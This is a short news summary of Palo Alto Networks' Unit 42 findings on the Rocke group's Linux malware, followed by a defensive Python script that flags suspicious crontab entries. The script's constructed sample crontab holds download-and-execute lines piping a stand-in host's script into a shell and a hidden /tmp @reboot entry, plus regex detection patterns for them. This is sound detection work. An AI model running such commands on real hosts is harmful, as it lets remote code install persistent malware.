Palo Alto Networks’ Unit 42 reports that it came across samples of malware used by a group called Rocke to infiltrate Linux systems and look for five different cloud security products that could block further malicious activity on the compromised hosts.
The analysis shows that Rocke’s attacks begin by exploiting vulnerabilities in other software to gain the foothold needed to deploy the malware. Flaws in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion are being used.
Once a host has been compromised, the malware downloads a script called a7 onto the system and establishes persistence using cron jobs.
It can also kill other mining processes running on the same host, block other malware with iptables rules, hide its own process, and uninstall agent-based cloud security products.
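Cron-based persistence of the kind described above leaves a trace in the crontab itself, so one practical check is to parse crontab content and flag entries that pipe a downloaded script into a shell or run from a hidden or world-writable drop location. The script below is an added example written for this summary, not code from Unit 42 or the Rocke samples; the crontab lines and the `example.invalid` host are constructed, and the real Rocke cron entries are not on this page.

```python
import re
from typing import Dict, List

# Constructed sample crontab (not from the Unit 42 report); the third
# and fourth entries mimic the download-and-execute / hidden-script pattern.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL http://example.invalid/a7 | sh
*/15 * * * * wget -q -O- http://example.invalid/a7 | bash
@reboot /tmp/.hidden/a7 >/dev/null 2>&1
"""

# Downloader output piped straight into a shell interpreter.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|ash|dash)\b")
# Command executed from a world-writable directory.
TMP_EXEC = re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+")
# Any dot-prefixed path component (hidden file or directory).
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split crontab text into (schedule, command) entries, skipping comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                 # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:                                    # five time fields, then command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        entries.append({"schedule": sched, "command": cmd})
    return entries


def flag_suspicious(entries: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return entries whose command matches a persistence indicator, with reasons."""
    findings = []
    for entry in entries:
        cmd = entry["command"]
        reasons = []
        if DOWNLOAD_EXEC.search(cmd):
            reasons.append("remote script piped into a shell")
        if TMP_EXEC.search(cmd):
            reasons.append("executes from a world-writable directory")
        if HIDDEN_PATH.search(cmd):
            reasons.append("references a hidden path")
        if reasons:
            findings.append({"schedule": entry["schedule"], "command": cmd, "reasons": reasons})
    return findings
```

On a live host, feed it the output of `crontab -l` for each user plus the contents of `/etc/cron.d` and `/etc/crontab`; a hit is a lead to examine, not proof of compromise.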
Given that the malware mostly targets security products developed by Alibaba and Tencent, most attacks are believed to be carried out in China, though the campaign could well expand to other regions. Both companies have already been informed of the attacks so that potential exploits can be blocked.
Submitted by: Arnfried Walbrecht